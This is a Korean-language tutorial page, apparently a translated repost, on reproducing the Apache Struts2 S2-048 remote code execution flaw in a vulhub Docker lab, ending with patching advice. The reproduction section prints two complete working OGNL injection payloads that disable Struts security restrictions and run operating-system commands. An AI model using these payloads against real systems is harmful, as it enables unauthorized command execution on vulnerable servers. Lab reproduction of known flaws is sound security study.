> 운영 및 유지보수 > 안전 > Apache Struts2-048 원격 코드 실행 취약점을 재현하는 방법

Apache Struts2-048 원격 코드 실행 취약점을 재현하는 방법

WBOY
풀어 주다: 2023-05-12 19:43:10
앞으로
1645명이 탐색했습니다.

0x00소개

Struts2 프레임워크는 Java EE 웹 애플리케이션 개발을 위한 오픈 소스 웹 애플리케이션 아키텍처입니다. Java Servlet API를 활용 및 확장하고 개발자가 MVC 아키텍처를 채택하도록 권장합니다. Struts2는 WebWork의 뛰어난 디자인 아이디어를 핵심으로 삼고 Struts 프레임워크의 장점 중 일부를 흡수하며 MVC 디자인 패턴으로 구현된 더욱 깔끔한 웹 애플리케이션 프레임워크를 제공합니다.

0x01 취약점 개요

Apache Struts2 2.3.x 시리즈에는 struts2-struts1-plugin 플러그인이 활성화되어 있고 struts2-showcase 디렉토리가 존재하는 이유는 ActionMessage가 고객이 제어할 수 있는 매개변수 데이터를 수신할 때입니다. 후속 데이터 접합이 전달됨 부적절한 사후 처리로 인해 임의 코드 실행이 발생함

0x02 영향 범위

struts2-struts1-plugin 플러그인이 활성화된 Apache Struts 2.3.x 시리즈 버전.

0x03 환경 구축

1. Apache Struts2를 직접 구축하는 것은 더 복잡합니다. 이 취약성 환경은 vulhub의 docker 환경을 사용하여 구축됩니다.

다운로드 주소: https://github.com/vulhub/vulhub

2. 다운로드 후 압축을 풀고 s2-048 디렉터리에 들어가서 취약점 환경을 시작하세요

cd cd vulhub-master/struts2/s2-048/ //디렉터리 입력

怎么进行Apache Struts2--048远程代码执行漏洞复现docker-compose up -d //촬영 범위 시작

怎么进行Apache Struts2--048远程代码执行漏洞复现3. docker ps를 사용하여 시작 성공 여부를 확인하세요

怎么进行Apache Struts2--048远程代码执行漏洞复现4. ip:8080/hello 브라우저 .action에서 다음 페이지 환경이 설정되어 있는지 확인하세요

怎么进行Apache Struts2--048远程代码执行漏洞复现

0x04 취약점 재발

1 브라우저에 다음 링크를 입력하여 취약점 페이지에 접속하세요

http ://192.168.3.160:8080/integration/saveGangster.action

怎么进行Apache Struts2--048远程代码执行漏洞复现2. 첫 번째 양식 "Gangster Name"에 ${1+1}을 입력하고 아래에 원하는 내용을 입력한 후 실행된 OGNL을 보려면 제출을 클릭하세요. 표현식

怎么进行Apache Struts2--048远程代码执行漏洞复现

怎么进行Apache Struts2--048远程代码执行漏洞复现2. Gangster Name"에서 ${1+1}을 다음 명령

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)으로 실행되는 페이로드 문으로 변경합니다.(# _memberAccess?(#_memberAccess=#dm):((# 컨테이너=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl. OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames() .clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@ org.apache.commons.io.IOUtils@toString(@ java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}

怎么进行Apache Struts2--048远程代码执行漏洞复现

怎么进行Apache Struts2--048远程代码执行漏洞复现3 . Burp를 사용하여 패킷을 캡처하고 명령 실행을 위한 페이로드로 수정할 수도 있습니다. ?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil @class)).(#ognlUtil.getExcludedPackageNames().clear()).(# ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id ').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe ','/c',#cmd}:{'/bin/bash',' -c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p. RedirectErrorStream(true)).(#process=#p.start()).(# ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons. io.IOUtils@copy(#process.getInputStream(),#ros)).(# ros.flush())}

4. 자동화된 스크립트나 그래픽 도구를 사용하여 구현할 수 있으며 여기서는 설명하지 않습니다.

Tools는 GitHub에서 검색하고 다운로드할 수 있습니다

0x05 수리 제안

1. 업그레이드 최신 버전으로 업그레이드하는 것이 좋습니다

2. 비즈니스 상황에 따라 struts-2.3을 비활성화하고 닫습니다(삭제). .xappsstruts2-showcase.war 패키지

위 내용은 Apache Struts2-048 원격 코드 실행 취약점을 재현하는 방법의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

관련 라벨:
원천:yisu.com
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
인기 튜토리얼
더>
최신 다운로드
더>
웹 효과
웹사이트 소스 코드
웹사이트 자료
프론트엔드 템플릿